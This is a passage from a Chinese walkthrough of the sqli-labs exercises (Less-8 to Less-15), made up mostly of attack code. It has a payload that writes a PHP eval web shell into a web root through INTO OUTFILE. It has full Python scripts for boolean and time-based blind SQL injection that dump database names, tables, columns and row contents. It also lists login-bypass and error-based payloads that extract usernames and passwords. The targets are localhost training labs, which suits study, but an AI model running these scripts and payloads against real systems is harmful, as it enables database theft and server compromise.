')) or 0 union all SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e,2,3 into outfile "D:\\wamp\\www\\weshell.php" --+

由于没有返回值,php 没法取到,在源码的逻辑下会报错

Day8-Less8

分析

同 5

代码

from requests import get

def GuessDBLength():
    """Return the length of the current database name (boolean blind probe).

    Sends one GET per candidate length, counting up from 0, and treats the
    substring 'Your Login name' in the response body as the "true" signal.
    There is no upper bound: the loop ends only when a candidate matches.
    As written, every request in this listing is addressed to the Less-1
    endpoint.
    """
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=0' or length(database())=%d--+" %i)
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    """Recover the database name one character at a time.

    For each 1-based position up to *length*, tries ASCII codes 0-126 in
    order and keeps the first one the oracle confirms ('Your Login name'
    in the response). A position where no code matches is skipped without
    error, so the returned string can be shorter than *length*.
    """
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            r = get("http://localhost/sqllab/Less-1/?id=0' or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += chr(n)
                print ' [-]', name
                break
    print ' [-]DBName is:', name
    return name

def GuessTBsNum(name):
    """Return the number of tables in schema *name*.

    Counts upward from 0, one GET per candidate, comparing the candidate
    server-side with count(TABLE_NAME) from INFORMATION_SCHEMA.TABLES.
    The first candidate whose response contains 'Your Login name' is
    returned (via break, then the return below). Unbounded loop.
    """
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    """Return the length of the table name at LIMIT offset *n* (0-based) in schema *name*.

    Probes positions i = 1, 2, ... using ascii(SUBSTR(..., i, 1)) as the
    condition and stops at the first position where the oracle does NOT
    fire (presumably SUBSTR past the end yields '' and ascii('') is 0 --
    MySQL semantics, not checked here); returns i-1.
    """
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    """Recover the names of the first *num* tables in schema *DBName*.

    For each table offset, first asks GuessTBNameLenth for the name length,
    then recovers each character by trying ASCII codes 0-126 and keeping the
    first one the oracle confirms. Returns the names in offset order; a
    position with no matching code is skipped silently.
    """
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print ' [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print ' [-]', name
                    break
        TBsNames.append(name)
    print ' [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    """Return the column count of table *tname* in schema *dname*.

    Counts upward from 0, one GET per candidate, until the response body
    contains 'Your Login name'. Unbounded loop.
    """
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The Colunm num is', i
            return i
        i+=1

def GuessCLMLen(cnum, tname, dname):
    """Return the length of the column name at LIMIT offset *cnum* (0-based).

    Same stop rule as GuessTBNameLenth: the first position i whose
    ascii(SUBSTR(...)) condition does not fire ends the scan; returns i-1.
    """
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    """Recover every column name of each table in *TNames*, then dump the column.

    Per table: GuessCLMNum gives the column count; per column, GuessCLMLen
    gives the name length and each character is found by trying ASCII codes
    0-126 (first confirmed code wins). Once a column name is complete,
    GuessDatas is called for that column; its result, bound to ``data``, is
    never used. Prints the column list per table and returns None.
    """
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if 'Your Login name' in html:
                        name += chr(n)
                        print ' [-]', name
                        break

            # Side effect only: the returned list is discarded.
            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    """Return the row count of *dname*.*tname* as reported by count(*cname*).

    Counts upward from 0 until the response contains 'Your Login name'.
    Unbounded loop.
    """
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    """Return the length of column *cname* in the row at LIMIT offset *n* (0-based).

    Scans positions 1, 2, ... and returns i-1 at the first position where
    the oracle does not fire.
    """
    print ' [-]Guessing data length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    """Recover the value of column *cname* for every row of *dname*.*tname*.

    Row count comes from GuessDatasnum, per-row length from GuessDataLen,
    and each character is found by trying ASCII codes 0-126. The request is
    wrapped in a retry loop: any exception raised by get() prints
    'Relaxing...' and the request is reissued immediately, with no delay
    and no attempt limit. Returns the recovered values in row order.
    """
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print ' [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:  # bare except: retries on every error type
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print ' [-]', name
                    break
        Data.append(name)
    print ' [-]All Datas of %s is:' %cname, Data
    return Data


# Driver: database name -> table names -> column names; GuessCLMName also
# dumps each column's rows through GuessDatas. Runs at import time (no
# __main__ guard).
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day9-Less9

分析

' or 1 union select 1,2,sleep(2) --+

0' or length(database())=8 --+
1' and length(database())=8 and sleep(2)--+

代码

from requests import get
from time import *

def GuessDBLength():
    """Return the length of the current database name (time-based blind probe).

    One GET per candidate length, counting up from 0. clock() (from the
    star-import of time) is read before the request, and an elapsed time
    above 1.5 s is taken as "true" (the payload appends sleep(2)). The
    response body is read into html but not inspected. No upper bound.
    """
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and length(database())=%d and sleep(2)--+" %i)
        html = r.text
        if clock()-s > 1.5:
            print ' [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    """Recover the database name one character at a time (timing oracle).

    For each 1-based position up to *length*, tries ASCII codes 0-126 in
    order and keeps the first whose request takes more than 1.5 s. A
    position where no code matches is skipped without error, so the
    returned string can be shorter than *length*.
    """
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            s = clock()
            r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR(database(),%d,1))='%d' and sleep(2)--+" %(i+1,n))
            html = r.text
            if clock()-s > 1.5:
                name += chr(n)
                print ' [-]', name
                break
    print ' [-]DBName is:', name
    return name

def GuessTBsNum(name):
    """Return the number of tables in schema *name* (timing oracle).

    Counts upward from 0, one GET per candidate; the first candidate whose
    request takes more than 1.5 s is returned (via break, then the return
    below). Unbounded loop.
    """
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') and sleep(2)--+" %(i,name))
        html = r.text
        if clock()-s > 1.5:
            print ' [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    """Return the length of the table name at LIMIT offset *n* (0-based) in schema *name*.

    Probes positions i = 1, 2, ... and stops at the first position whose
    request returns in under 1.5 s (the sleep(2) no longer fires); returns
    i-1.
    """
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) and sleep(2)--+" %(name,n,i))
        html = r.text
        if clock()-s < 1.5:
            print ' [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    """Recover the names of the first *num* tables in schema *DBName* (timing oracle).

    For each table offset, first asks GuessTBNameLenth for the name length,
    then recovers each character by trying ASCII codes 0-126 and keeping the
    first whose request exceeds 1.5 s. Returns the names in offset order; a
    position with no matching code is skipped silently.
    """
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print ' [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                s = clock()
                r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' and sleep(2)--+" %(DBName,no,i+1,n))
                html = r.text
                if clock()-s > 1.5:
                    name += chr(n)
                    print ' [-]', name
                    break
        TBsNames.append(name)
    print ' [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    """Return the column count of table *tname* in schema *dname* (timing oracle).

    Counts upward from 0, one GET per candidate, until a request takes more
    than 1.5 s. Unbounded loop.
    """
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') and sleep(2)--+" %(i,tname,dname))
        html = r.text
        if clock()-s > 1.5:
            print ' [-]The Colunm num is', i
            return i
        i+=1

def GuessCLMLen(cnum, tname, dname):
    """Return the length of the column name at LIMIT offset *cnum* (0-based).

    Same stop rule as GuessTBNameLenth: the first position i whose request
    returns in under 1.5 s ends the scan; returns i-1.
    """
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) and sleep(2)--+" %(tname,dname,cnum,i))
        html = r.text
        if clock()-s < 1.5:
            print ' [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    """Recover every column name of each table in *TNames*, then dump the column.

    Per table: GuessCLMNum gives the column count; per column, GuessCLMLen
    gives the name length and each character is found by trying ASCII codes
    0-126, keeping the first whose request exceeds 1.5 s. Once a column name
    is complete, GuessDatas is called for that column; its result, bound to
    ``data``, is never used. Prints the column list per table and returns
    None.
    """
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    s = clock()
                    r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' and sleep(2)--+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if clock()-s > 1.5:
                        name += chr(n)
                        print ' [-]', name
                        break

            # Side effect only: the returned list is discarded.
            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    """Return the row count of *dname*.*tname* as reported by count(*cname*).

    Counts upward from 0 until a request takes more than 1.5 s.
    Unbounded loop.
    """
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(%s) FROM %s.%s) and sleep(2)--+" %(i,cname,dname,tname))
        html = r.text
        if clock()-s > 1.5:
            print ' [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    """Return the length of column *cname* in the row at LIMIT offset *n* (0-based).

    Scans positions 1, 2, ... and returns i-1 at the first position whose
    request returns in under 1.5 s.
    """
    print ' [-]Guessing data length'
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) and sleep(2)--+" %(cname, dname, tname, n, i))
        html = r.text
        if clock()-s < 1.5:
            print ' [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    """Read every value of column `cname` in `dname`.`tname`, character by
    character, and return them as a list of strings (also printed).

    Unlike the other probes, each request is wrapped in a retry loop: a bare
    `except:` swallows *any* failure (under Python 2 that includes
    KeyboardInterrupt) and simply tries again, so a permanently failing
    request spins forever printing 'Relaxing...'. `s` is reset on every
    retry, so only the attempt that succeeded is timed.
    """
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print ' [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    s = clock()
                    try:
                        r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' and sleep(2)--+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if clock()-s > 1.5:
                    name += chr(n)
                    print ' [-]', name
                    break
        Data.append(name)
    print ' [-]All Datas of %s is:' %cname, Data
    return Data


# Driver: schema name -> tables -> columns -> rows, each stage fed by the
# previous one. GuessDBLength/GuessDBName/GuessTBsNum/GuessTBsNames are
# presumably defined earlier in this script, above this excerpt.
# From the server's side a run is hundreds of sequential, near-identical
# requests to a single parameter, each carrying sleep(2) and stalling ~2 s
# on a hit -- the shape slow-query logging and WAF rate rules are meant
# to catch.
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day10-Less10

分析

同 9
只是单引号改双引号

代码

from requests import get
from time import *

def GuessDBLength():
    """Length of database(), found by testing length(database())=i for
    i = 0, 1, 2, ...

    Less-10 closes the injected value with a double quote instead of the
    single quote used in Less-9; everything else is identical. sleep(2)
    fires only on the true comparison, so a response slower than 1.5 s is
    the answer. Never returns if nothing matches.
    """
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        # NOTE(review): time.clock() is deprecated and platform-specific; the
        # check below assumes it advances like a wall clock while the request
        # blocks -- confirm on the interpreter in use.
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and length(database())=%d and sleep(2)--+" %i)
        html = r.text  # unused; timing is the only oracle
        if clock()-s > 1.5:
            print ' [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    """Recover database() character by character given its `length`.

    For each position, n = 0..126 is tried in order (7-bit ASCII only) and
    the first delayed response fixes chr(n); a position that never matches
    is skipped, so the result may be shorter than `length`.
    Returns the recovered name (also printed).
    """
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            s = clock()
            r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR(database(),%d,1))='%d' and sleep(2)--+" %(i+1,n))
            html = r.text
            if clock()-s > 1.5:
                name += chr(n)
                print ' [-]', name
                break
    print ' [-]DBName is:', name
    return name

def GuessTBsNum(name):
    """Number of tables in schema `name`, by testing count(TABLE_NAME)=i
    for i = 0, 1, 2, ...

    Same timing oracle as GuessDBLength(); the loop breaks on the match
    and the count is returned after the loop. Never returns if no i matches.
    """
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') and sleep(2)--+" %(i,name))
        html = r.text
        if clock()-s > 1.5:
            print ' [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    """Length of the name of table number `n` (0-based, LIMIT n,1) in
    schema `name`.

    ascii(SUBSTR(..., i, 1)) is 0/NULL past the end of the string, so
    sleep(2) stops firing there; the first fast response (< 1.5 s) means
    i-1 characters exist. The comparison is inverted relative to the
    count probes.
    """
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) and sleep(2)--+" %(name,n,i))
        html = r.text
        if clock()-s < 1.5:
            print ' [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    """Recover the names of the first `num` tables of schema `DBName`.

    Each name's length comes from GuessTBNameLenth(); characters are then
    fixed one position at a time by the same 0..126 linear scan as
    GuessDBName(). Returns the list of names (also printed).
    """
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print ' [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                s = clock()
                r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' and sleep(2)--+" %(DBName,no,i+1,n))
                html = r.text
                if clock()-s > 1.5:
                    name += chr(n)
                    print ' [-]', name
                    break
        TBsNames.append(name)
    print ' [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    """Count the columns of table `tname` in schema `dname` by testing
    count(COLUMN_NAME)=i for i = 0, 1, 2, ...

    A response slower than 1.5 s is the match; the body is fetched but not
    inspected. Never returns if no i matches.
    """
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') and sleep(2)--+" %(i,tname,dname))
        html = r.text
        if clock()-s > 1.5:
            print ' [-]The Colunm num is', i
            return i
        i+=1

def GuessCLMLen(cnum, tname, dname):
    """Length of the name of column number `cnum` (0-based) of `tname`
    in `dname`; first fast response (< 1.5 s) at position i means i-1
    characters exist.
    """
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) and sleep(2)--+" %(tname,dname,cnum,i))
        html = r.text
        if clock()-s < 1.5:
            print ' [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    """Recover every column name of each table in `TNames` character by
    character, dumping each column via GuessDatas() once named.
    Results are only printed; returns None.
    """
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    s = clock()
                    r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' and sleep(2)--+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if clock()-s > 1.5:
                        name += chr(n)
                        print ' [-]', name
                        break

            # `data` is unused; GuessDatas() prints its own result.
            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print ' [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    """Row count of `dname`.`tname` measured as count(`cname`); linear
    search from 0 with the usual 1.5 s timing oracle.
    """
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(%s) FROM %s.%s) and sleep(2)--+" %(i,cname,dname,tname))
        html = r.text
        if clock()-s > 1.5:
            print ' [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    """Length of the value in column `cname` of row `n` (0-based) of
    `dname`.`tname`; first fast response at position i means i-1 chars.
    """
    print ' [-]Guessing data length'
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) and sleep(2)--+" %(cname, dname, tname, n, i))
        html = r.text
        if clock()-s < 1.5:
            print ' [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    """Read every value of column `cname` in `dname`.`tname` character by
    character; returns the list of strings (also printed).

    The request sits in a retry loop whose bare `except:` swallows any
    failure (KeyboardInterrupt included under Python 2) and retries
    indefinitely; `s` is reset per attempt so only the successful one is
    timed.
    """
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print ' [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    s = clock()
                    try:
                        r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' and sleep(2)--+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if clock()-s > 1.5:
                    name += chr(n)
                    print ' [-]', name
                    break
        Data.append(name)
    print ' [-]All Datas of %s is:' %cname, Data
    return Data

# Driver: schema name -> tables -> columns -> rows. The module-level `s`
# times the whole run (the functions above shadow it with their own local
# `s`). Hundreds of slow, sequential, near-identical requests to one
# parameter is the traffic shape rate limiting and slow-query monitoring
# are tuned to flag.
s = clock()
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'
print '[!]Timer', round(clock()-s,2),'s'```

## Day11-Less11
### 分析

select XX,XX,XX from XX where username = '$uname' and password = '$passwd'
1' group by 3#
报错

select XX,XX from XX where username = '$uname' and password = '$passwd'

Username:' or 1 limit 1,2#
Password:(任意)


## Day12-Less12
### 分析

select XX,XX,XX from XX where username = ("$uname") and password = ("$passwd")
1") group by 3#
报错

select XX,XX from XX where username = ("$uname") and password = ("$passwd")

Username:") or 1 limit 1,2#
Password:(任意)


## Day13-Less13
### 分析

select XX,XX from XX where username = ('$uname') and password = ('$passwd')

') union select 1,2 from INFORMATION_SCHEMA.tables where updatexml(1,concat('',(select username from security.users limit 0,1),'',(select password from security.users limit 0,1)),1) #


## Day14-Less14
### 分析

select XX,XX from XX where username = "$uname" and password = "$passwd"

" union select 1,2 from INFORMATION_SCHEMA.tables where updatexml(1,concat('',(select username from security.users limit 0,1),'',(select password from security.users limit 0,1)),1) #


## Day15-Less15
### 分析

select XX,XX from XX where username = '$uname' and password = '$passwd'
1' or 1 #


### 代码
```python
from requests import post

def GuessDBLength():
    """Length of database(), by testing length(database())=i for
    i = 0, 1, 2, ... through the login form.

    Less-15 is a boolean oracle rather than a timing one: a successful
    login renders flag.jpg, so `'flag.jpg' in html` is the true/false
    signal. Never returns if no i matches.
    """
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        payload = {'uname': "0' or length(database())=%d#" %i, 'passwd': ''}
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' in html:
            print ' [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    """Recover database() character by character given its `length`.

    Each position tries n = 0..126 in order (7-bit ASCII only); the first
    response containing flag.jpg fixes chr(n). A position with no match is
    skipped, so the result may be shorter than `length`. Returns the name.
    """
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            payload = {'uname': "0' or ascii(SUBSTR(database(),%d,1))='%d'#" %(i+1,n), 'passwd': ''}
            r = post("http://localhost/sqllab/Less-15/",data=payload)
            html = r.text
            if 'flag.jpg' in html:
                name += chr(n)
                print ' [-]', name
                break
    print ' [-]DBName is:', name
    return name

def GuessTBsNum(name):
    """Number of tables in schema `name`; linear search from 0 using the
    flag.jpg boolean oracle. Breaks on the match, returns after the loop.
    """
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        payload = {'uname': "' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') #" %(i,name), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' in html:
            print ' [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    """Length of the name of table number `n` (0-based) in schema `name`.

    ascii(SUBSTR(..., i, 1)) is 0/NULL past the end, so the login fails
    there; the first response *without* flag.jpg means i-1 characters.
    Note the inverted test compared with the count probes.
    """
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        payload = {'uname': "' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) #" %(name,n,i), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' not in html:
            print ' [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    """Recover the names of the first `num` tables of schema `DBName`
    (length via GuessTBNameLenth(), then a 0..126 scan per position).
    Returns the list of names (also printed).
    """
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print ' [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                payload = {'uname': "' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' #" %(DBName,no,i+1,n), 'passwd': ''}
                r = post("http://localhost/sqllab/Less-15/",data=payload)
                html = r.text
                if 'flag.jpg' in html:
                    name += chr(n)
                    print ' [-]', name
                    break
        TBsNames.append(name)
    print ' [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    """Count the columns of `tname` in schema `dname`; linear search from 0
    with the flag.jpg boolean oracle. Never returns if no i matches.
    """
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        payload = {'uname': "' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') #" %(i,tname,dname), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' in html:
            print ' [-]The Colunm num is', i
            return i
        i+=1

def GuessCLMLen(cnum, tname, dname):
    """Length of the name of column `cnum` (0-based) of `tname`; the first
    response without flag.jpg at position i means i-1 characters exist.
    """
    i = 1
    while 1:
        payload = {'uname': "' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) #" %(tname,dname,cnum,i), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' not in html:
            print ' [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

